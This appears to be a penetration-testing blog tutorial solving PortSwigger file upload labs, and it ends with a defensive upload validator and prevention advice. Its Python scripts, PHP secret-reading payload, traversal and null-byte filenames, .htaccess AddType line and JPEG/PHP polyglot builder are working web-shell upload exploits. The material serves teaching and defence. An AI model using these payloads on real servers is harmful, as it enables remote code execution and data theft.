Methods For Exploiting File Upload Vulnerabilities

July 20, 2022



What Are File Upload Vulnerabilities?

Before we discuss how to exploit file upload vulnerabilities, it's important to understand what a file upload function is. A file upload function lets a user write a file to the web server's file system. It usually enforces rules (for example, only JPG files are accepted). So what happens if we manage to upload a PHP file through a function that is supposed to accept only JPGs, and the server then executes it? This is where file upload vulnerabilities arise.

How Dangerous Are File Upload Vulnerabilities?

The impact of a file upload vulnerability depends on a few key factors.

  • If the website fails to properly validate the uploaded file's type and content, an attacker can upload a file containing server-side code (a web shell). If the server then executes that file, the attacker gains code execution on the server, which is the most dangerous outcome.
  • If the website fails to validate the uploaded file's name, an attacker can overwrite existing files by uploading a file with the same name. If the upload function is also vulnerable to directory traversal, the attacker can write to unanticipated locations outside the upload directory (for example apache2.conf).
  • If the website fails to limit the uploaded file's size, an attacker can rapidly fill the available disk space. This is a form of denial-of-service (DoS) attack.


How To Exploit File Upload Vulnerabilities?

In this section, we walk through how to exploit file upload vulnerabilities step by step, with several worked examples.

The example cases used in this post are lab environments from PortSwigger.

1. Basic Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can then log in to your own account using the following credentials: wiener:peter.

Step #1: We log in as the user wiener and look for a file upload function in the application.

Portswigger Academy file upload vulnerability-lab 1 main application page

Step #2: We have located a file upload function in the user’s profile.

Portswigger Academy file upload vulnerability-lab 1 file upload function page

Step #3: After locating the file upload function, we create a PHP file containing the one-liner shown in the screenshot below, which reads the secret of the user "Carlos" from /home/carlos/secret and echoes it back in the response.

PHP one-liner arbitrary file read payload

Step #4: Now we can upload the PHP file that we created earlier.

HTTP request and response of uploading the payload in Burp Suite proxy

Step #5: Now we need to make the web server execute the file. To do this, we send a GET request to the uploaded file; the upload response in the screenshot above shows where it was stored (/files/avatars/file_upload_test.php). Because the server hands .php files in that directory to the PHP interpreter, the request runs our code and the response contains the secret of the user "Carlos".

HTTP request and response of reading the secret of the user Carlos in Burp Suite proxy

Step #6: Submit the flag and the lab is solved!

Portswigger Academy file upload vulnerability-lab 1 solved page

Note: We are not going to show the main application and lab solved page in the other sections.

2. Web Shell Upload via Content-Type Restriction Bypass

Condition: To solve this lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We find the same file upload function and try to upload the same PHP file. This time the application rejects it because of a Content-Type restriction.

HTTP request and the response of file upload function that has Content-Type restriction in Burp Suite proxy

Step #2: The error message shows that the application only allows the image/jpeg and image/png content types. The check trusts the Content-Type header of the multipart part, which is entirely under the client's control, so we simply changed it to image/jpeg in Burp. The file was then uploaded to the /avatars/file_upload.php endpoint.

HTTP request and response of Content-Type restriction bypassed file upload function in Burp Suite proxy

Step #3: We now make a GET request to the uploaded file and read the secret of the user "Carlos".

HTTP request and the response of reading the secret of the user Carlos in Burp Suite proxy

3. Web Shell Upload via Directory Traversal

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: As in the previous examples, the first step is inspecting the file upload function. Here there is no restriction at all on uploading a PHP file to the server.

HTTP request and the response of uploading the PHP file to the web server in Burp Suite proxy

Step #2: But when we make a GET request to the uploaded PHP file, the server returns its contents as plain text instead of executing it: the /files/avatars directory is evidently configured not to execute PHP.

HTTP request and plain text response of uploaded PHP file in Burp Suite proxy

Step #3: After trying some bypass techniques, we found that we can place the file somewhere else via directory traversal. We change the filename from file_upload_test.php to ..%2ffile_upload_test.php. The URL-encoded slash gets the traversal sequence past the upload function's filename check, and the server decodes it before writing, so the response shows the file saved in /files (the parent directory of /avatars) rather than in the non-executing /files/avatars directory.

HTTP request and response of uploading the PHP file via directory traversal in Burp Suite proxy

Step #4: A GET request to /files/avatars/../file_upload_test.php now returns the secret of the user "Carlos". The same file can also be reached directly at /files/file_upload_test.php.

HTTP request and response of reading the secret of the user Carlos with endpoint 1 in Burp Suite proxy

HTTP request and the response of reading the secret of the user Carlos with endpoint 2 in Burp Suite proxy

4. Web Shell Upload via Blacklisted Extension Bypass

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We use the same file upload function. This time the HTTP response body contains an error message saying that PHP files are not allowed, i.e. the .php extension is blacklisted.

HTTP request and the response of not allowed PHP file restriction in Burp Suite proxy

Step #2: After a few tries we found a way past the blacklist, reusing what we learned in the previous examples. First we upload a file named .htaccess into the avatars directory. Apache reads per-directory .htaccess files, so the uploaded one changes the configuration of that directory, and the blacklist does not stop it because .htaccess is not a PHP extension. Its content is a single line, AddType application/x-httpd-php .prplbx, which tells Apache to hand any file with the .prplbx extension to the PHP handler.

HTTP request and the response of overwriting htaccess file in Burp Suite proxy

Step #3: The blacklist does not know about .prplbx either, so we can now upload our PHP file with that extension.

HTTP request and the response of uploading PHP file with .prplbx extension in Burp Suite proxy

Step #4: Now we can read the secret of the user "Carlos" as before. The only difference is that this time we make the GET request to file_upload_test.prplbx instead of file_upload_test.php.

HTTP request and the response of reading the secret of the user Carlos in Burp Suite proxy

5. Web Shell Upload via Obfuscated File Extension

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We use the same file upload function. The error message in the HTTP response body says that PHP files are not allowed; only JPG and PNG files are accepted, so the check is on the file extension.

HTTP request and the response of restriction except for image files in Burp Suite proxy

Step #2: After a few tries we found a working method: obfuscating the filename. If we append a URL-encoded null byte followed by an allowed extension to the name (for example file_upload_test.php%00.jpg), the extension check sees a name ending in .jpg and accepts it, but the file is written as file_upload_test.php, because the server decodes %00 and the underlying filesystem call treats the null byte as the end of the string.

HTTP request and response of only image files restriction bypass with NULL byte method in Burp Suite proxy

Step #3: Now we can access the secret of the user Carlos as usual.

HTTP request and the response of reading the secret of the user Carlos in Burp Suite proxy
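The five uploads above (plain PHP file, spoofed Content-Type, ..%2f traversal name, .htaccess plus custom extension, and null-byte name) differ only in the filename, Content-Type and body of one multipart part. The script below is an added example, not code from the original post or from PortSwigger: it builds that multipart request the way Burp sends it, and models why the traversal and null-byte names land where they do on a careless server. The PHP one-liner, the .htaccess line, the avatar form's endpoint and field names are assumptions; the lab form also posts a user and CSRF field that you should read from the real form before sending.

```python
"""Added example: craft the upload requests from examples 1 to 5 and model
where a naive server stores each file. Not the page's own code."""
import posixpath
import urllib.request
import uuid
from urllib.parse import unquote

# Assumed payload: the page shows its one-liner only in a screenshot.
PHP_READ_SECRET = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
# Example 4's .htaccess line as the page gives it (lower-cased MIME type).
HTACCESS_PRPLBX = b"AddType application/x-httpd-php .prplbx\n"

# (filename, Content-Type, body) exactly as typed into Burp for each example.
LAB_UPLOADS = {
    "1_basic":        ("file_upload_test.php",        "application/octet-stream", PHP_READ_SECRET),
    "2_content_type": ("file_upload_test.php",        "image/jpeg",               PHP_READ_SECRET),
    "3_traversal":    ("..%2ffile_upload_test.php",   "application/octet-stream", PHP_READ_SECRET),
    "4a_htaccess":    (".htaccess",                   "text/plain",               HTACCESS_PRPLBX),
    "4b_custom_ext":  ("file_upload_test.prplbx",     "application/octet-stream", PHP_READ_SECRET),
    "5_null_byte":    ("file_upload_test.php%00.jpg", "application/octet-stream", PHP_READ_SECRET),
}


def build_multipart(field, filename, content_type, data, extra_fields=None, boundary=None):
    """Return (Content-Type header value, request body) for one file upload.

    The filename is copied into the part header verbatim, so the traversal
    sequence and the %00 reach the server exactly as Burp would send them.
    extra_fields are plain text parts (the lab form also posts a user and a
    CSRF token; their names are assumptions, read them from the form).
    """
    boundary = boundary or "----PrplbxBoundary" + uuid.uuid4().hex[:12]
    parts = []
    for name, value in (extra_fields or {}).items():
        parts.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode())
    parts.append(
        (f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
         f"Content-Type: {content_type}\r\n\r\n").encode() + data + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", b"".join(parts)


def naive_extension_check(filename):
    """The weak check of example 5: it only looks at how the decoded name ends."""
    return unquote(filename).lower().endswith((".jpg", ".jpeg", ".png"))


def stored_path(upload_dir, filename):
    """Where a careless server writes the file.

    It URL-decodes the name and joins it under upload_dir without checking
    for traversal; the filesystem call then stops at the first NUL byte,
    which is why file_upload_test.php%00.jpg is saved as file_upload_test.php.
    """
    name = unquote(filename).split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(upload_dir, name))


def upload(lab_url, cookie, lab, extra_fields=None):
    """Send one LAB_UPLOADS entry to a running lab (network; the endpoint and
    the field name 'avatar' are assumptions taken from the avatar form)."""
    filename, content_type, data = LAB_UPLOADS[lab]
    header, body = build_multipart("avatar", filename, content_type, data, extra_fields)
    req = urllib.request.Request(lab_url.rstrip("/") + "/my-account/avatar", data=body, method="POST")
    req.add_header("Content-Type", header)
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode(errors="replace")


def read_secret(lab_url, cookie, path):
    """GET the uploaded file so the server executes it, e.g.
    /files/avatars/file_upload_test.php or /files/file_upload_test.php."""
    req = urllib.request.Request(lab_url.rstrip("/") + path)
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Offline: show where each filename ends up on the naive server model.
    for lab, (filename, _, _) in LAB_UPLOADS.items():
        print(f"{lab:15} {filename:30} -> {stored_path('/files/avatars', filename)}")
```

Running the script without arguments only prints the naive-server model: the traversal name resolves to /files/file_upload_test.php and the null-byte name to /files/avatars/file_upload_test.php, while naive_extension_check still accepts the latter because it sees the .jpg ending before the NUL truncation happens. upload() and read_secret() need a live lab URL and your session cookie.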

6. Remote Code Execution via Polyglot Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We use the same file upload function. This time the error message in the HTTP response body says that the uploaded file is not a valid image: the server inspects the file's contents, not just its extension or Content-Type, so the bypasses from the previous examples no longer work on their own.

HTTP request and the response of uploaded file is not a valid image in Burp Suite proxy

Step #2: So we embed the PHP payload in the metadata of a genuine image using ExifTool. The result is a polyglot: a valid JPEG that passes the image check, and at the same time a PHP script, because the PHP interpreter ignores everything outside the <?php ... ?> tags. We give the output file a .php extension so that the server executes it.

Creating malicious jpg file using exiftool

Step #3: After creating the polyglot, we upload it as our new PHP file; the image validation accepts it.

HTTP request and response of uploading polyglot PHP file in Burp Suite proxy

Step #4: Now we can access the secret of the user “Carlos” as usual.

HTTP request and response of reading the secret of the user Carlos in Burp Suite proxy
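To make the polyglot concrete, the following is an added example (not the page's code and not ExifTool) that does in pure Python what the screenshot does with exiftool's -Comment option: it inserts a JPEG COM segment carrying the PHP one-liner right after the SOI marker, and walks the marker segments back to show that the result is still a structurally valid JPEG with the payload inside it. The PHP payload is an assumption, and the embedded JPEG skeleton is a constructed stand-in with only the SOI, APP0/JFIF and EOI markers; it is enough for a magic-byte check, but use a real photo against the lab.

```python
"""Added example: build and inspect a JPEG/PHP polyglot in pure Python.
Equivalent ExifTool command (as used in the lab):
    exiftool -Comment="<?php echo file_get_contents('/home/carlos/secret'); ?>" in.jpg -o polyglot.php
"""
import struct

# Assumed payload (the page shows its one-liner only in a screenshot).
PHP_READ_SECRET = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"

# Constructed stand-in for a real photo: SOI + minimal JFIF APP0 + EOI.
# Not a decodable picture, but it carries the markers a header check reads.
MINIMAL_JPEG = (
    b"\xff\xd8"                                   # SOI
    + b"\xff\xe0" + struct.pack(">H", 16)          # APP0, length 16 incl. itself
    + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xd9"                                  # EOI
)


def add_comment(jpeg, payload):
    """Insert a COM (0xFFFE) segment carrying payload right after SOI.

    PHP ignores everything outside <?php ... ?>, so the two bytes of SOI and
    the COM header that precede the payload are harmless when the file is
    run as PHP, and image parsers treat the segment as an opaque comment.
    """
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    if len(payload) + 2 > 0xFFFF:
        raise ValueError("a COM segment holds at most 65533 payload bytes")
    segment = b"\xff\xfe" + struct.pack(">H", len(payload) + 2) + payload
    return jpeg[:2] + segment + jpeg[2:]


def segments(jpeg):
    """Yield (marker, data) for each marker segment up to SOS or EOI."""
    pos = 2                                         # skip SOI
    while pos + 2 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                  # EOI, or SOS (scan data follows)
            yield marker, b""
            return
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        yield marker, jpeg[pos + 4:pos + 2 + length]
        pos += 2 + length


def php_comment(jpeg):
    """Return the first COM segment containing a PHP open tag, or None."""
    for marker, data in segments(jpeg):
        if marker == 0xFE and b"<?php" in data:
            return data
    return None


def looks_like_jpeg(data):
    """What a typical 'is this a valid image' check sees: SOI first, EOI last."""
    return data[:2] == b"\xff\xd8" and data[-2:] == b"\xff\xd9"


def make_polyglot(source_jpeg=MINIMAL_JPEG, payload=PHP_READ_SECRET):
    """The file to upload: give it a .php name so the server executes it."""
    return add_comment(source_jpeg, payload)


if __name__ == "__main__":
    with open("file_upload_test.php", "wb") as fh:
        fh.write(make_polyglot())
    print("wrote file_upload_test.php:", [hex(m) for m, _ in segments(make_polyglot())])
```

The parser in segments() is also a handy check on the server side: a hardened image pipeline re-encodes the picture or strips unknown segments rather than trusting the original bytes, which removes the COM payload entirely.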

How To Prevent File Upload Vulnerabilities?

The most effective defence is to implement all of the following practices together:

  • Compare the file extension against a whitelist of allowed extensions rather than a blacklist of prohibited ones. It is far easier to enumerate the few extensions you want to allow than every extension an attacker might try, including a custom one mapped to PHP through an uploaded .htaccess (example 4).
  • Make sure the filename contains no substring that could be interpreted as a directory or traversal sequence (../, also in URL-encoded form such as ..%2f) and no null byte (%00). Validate the decoded name, and validate the extension of the name that will actually be written (examples 3 and 5).
  • Rename uploaded files to a server-generated name to avoid collisions that could overwrite existing files, such as .htaccess.
  • Validate the file's content rather than the Content-Type header, which the client fully controls (example 2). Remember that a file can be a valid image and a valid script at the same time (example 6), so also store uploads where the web server will not execute them and serve them with an image content type.
  • Do not write files to the server's filesystem until they have been fully validated, and enforce a size limit.
  • Whenever possible, use an established framework for preprocessing file uploads rather than writing your own validation mechanisms.
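As an added example (not code from the original post), here is an upload validator that applies those practices in the order a practitioner wants them: size first, then the decoded filename, then the extension against an allow-list, then magic bytes that must agree with the extension, and only then an exclusive write under a random server-generated name. The upload directory, size limit and allow-list are assumptions; the sample file contents are constructed.

```python
"""Added example: a file upload validator applying the page's recommendations.
Not the page's code; storage root, limit and allow-list are assumptions."""
import posixpath
import secrets
from urllib.parse import unquote

UPLOAD_ROOT = "/srv/app/uploads"        # assumed: outside the web root, no script execution
MAX_BYTES = 2 * 1024 * 1024             # assumed limit; stops the disk-filling DoS
# allow-listed extension -> magic bytes the content must start with
ALLOWED = {
    ".jpg":  b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png":  b"\x89PNG\r\n\x1a\n",
}

# Constructed sample contents for the checks below.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 64
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
SAMPLE_PHP = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"


class UploadRejected(ValueError):
    """Carries the reason; log it server-side and return a generic error."""


def validate_upload(filename, content):
    """Return (stored_name, extension) or raise UploadRejected.

    The multipart Content-Type the client declared is never consulted: the
    decision rests on the decoded name, the allow-list and the file's bytes.
    """
    if len(content) > MAX_BYTES:
        raise UploadRejected("file too large")
    name = unquote(filename)            # see %00 and %2f the way the OS would
    if any(c in name for c in "\x00/\\") or ".." in name:
        raise UploadRejected("path or NUL characters in filename")
    if not name or name.startswith("."):
        raise UploadRejected("dotfiles such as .htaccess are not accepted")
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension {ext!r} not in allow-list")
    if not content.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    # The client-chosen name is never reused: no collisions, no overwrites,
    # and the stored extension is always one from the allow-list.
    return secrets.token_hex(16) + ext, ext


def is_rejected(filename, content):
    """True if validate_upload refuses the file (convenience for tests)."""
    try:
        validate_upload(filename, content)
    except UploadRejected:
        return True
    return False


def store(filename, content, root=UPLOAD_ROOT):
    """Validate fully in memory first, then create the file exclusively ('xb')
    so an existing file is never overwritten even if names ever collide."""
    stored_name, _ = validate_upload(filename, content)
    path = posixpath.join(root, stored_name)
    with open(path, "xb") as fh:
        fh.write(content)
    return path


if __name__ == "__main__":
    for fn, data in [("photo.jpg", SAMPLE_JPEG), ("file_upload_test.php", SAMPLE_PHP),
                     ("file_upload_test.php%00.jpg", SAMPLE_JPEG), ("..%2fx.jpg", SAMPLE_JPEG),
                     (".htaccess", b"AddType application/x-httpd-php .prplbx\n")]:
        print(f"{fn:32} rejected={is_rejected(fn, data)}")
```

Note what this validator does and does not do about example 6: a JPEG with PHP in a comment segment still passes the magic-byte check, because it is a valid image. It is made harmless by the surrounding rules, a random .jpg name, storage outside the web root where nothing is executed, and serving with an image content type. Re-encoding the image with an image library before storage would additionally strip the comment.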

Conclusion

In this blog post, we looked at what file upload vulnerabilities are and the damage they can do. We then walked through six methods for exploiting them, from a plain web shell upload to Content-Type, traversal, blacklist, null-byte and polyglot bypasses, and finished with the practices that prevent them.

We hope you found our blog post useful and it will help you to make secure file uploads in the future. Don’t forget to check out our Penetration Testing services to stay secure!